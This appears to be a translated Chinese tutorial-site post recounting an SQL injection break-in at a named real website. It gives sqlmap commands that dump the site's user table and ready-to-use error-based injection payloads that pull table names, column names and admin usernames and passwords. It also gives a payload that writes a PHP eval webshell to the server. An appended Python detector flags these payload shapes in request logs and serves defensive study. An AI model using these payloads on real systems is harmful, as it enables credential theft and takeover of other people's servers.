Source: 自学PHP网  Date: 2015-04-16 23:14
[Summary] Reconnaissance: Target site: http://www.sixxf.it  Server IP: 192.232.2xx.97 (United States)  Platform: PHP  Server: Apache. Probing this site's information from the web pages was not very complete this time, so let's get straight to the point: open the site's backend, and in the login account...

Reconnaissance:
Target site: http://www.sixxf.it

root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -p username --dbs
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt --dbs -p
# -p specifies which parameters to test (for ?page=1&id=2 use -p "page,id"). When using -p, the first run only returned one database and the second run returned them all; test it yourself.
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf --tables
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user --columns
root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user -C username,userpassword --dump

Extending the idea: look at the domain name and the database name; don't they seem a bit similar? Right, they use the same one, so it is entirely possible to get into the backend through social engineering. The PHP backend login form can also be injected manually with the following statements.

General form:
'and(select 1 from(select count(*),concat((select concat(function1,0x20,function2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1. Dump table names
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2. Dump column names
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=(hex of the table name) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=(hex of the table name) limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=(hex of the table name) limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

3. Dump usernames and passwords
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

4. Export a webshell
'or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #
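As an added example that is not part of the original write-up, the following Python detector scans web-server request log lines for the three payload shapes used above: the floor(rand(0)*2) / group by error-based trick, information_schema enumeration, and INTO OUTFILE file writes. The log lines, the rule names and the file path are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Rule names are assumptions for this example; the patterns follow the
# payload shapes shown in the write-up (double-query error-based injection,
# information_schema enumeration, and INTO OUTFILE used to drop a file).
SIGNATURES = {
    "error_based_dupkey": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "schema_enumeration": re.compile(
        r"information_schema\s*\.\s*(tables|columns)", re.I),
    "file_write": re.compile(r"into\s+(out|dump)file", re.I),
}


def normalize(value):
    """Undo URL encoding (applied up to twice), strip /**/ padding, collapse spaces."""
    v = value
    for _ in range(2):
        v = unquote_plus(v)
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)
    return re.sub(r"\s+", " ", v)


def classify(request_text):
    """Return the names of every signature that matches the normalized request."""
    text = normalize(request_text)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


# Constructed sample request log lines (method, path, body); not real traffic.
SAMPLE_LOG = [
    "POST /admin/login.php username=admin&password=secret",
    "POST /admin/login.php username=%27and(select+1+from(select+count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema%3Ddatabase()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and%27&password=x",
    "GET /index.php?page=1&id=2",
    "GET /index.php?id=1%27+or+1+AND+(SELECT+id+FROM+the_users+limit+1+INTO+OUTFILE+%27/tmp/example.php%27)%23",
]


def scan(lines):
    """Return (line_number, labels) for every request line that triggers a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        labels = classify(line)
        if labels:
            hits.append((n, labels))
    return hits


if __name__ == "__main__":
    for n, labels in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(labels)}")
```

Run against real access logs, the decoded match text is what an analyst would pivot on; the login form itself is fixed by parameterized queries rather than by this filter.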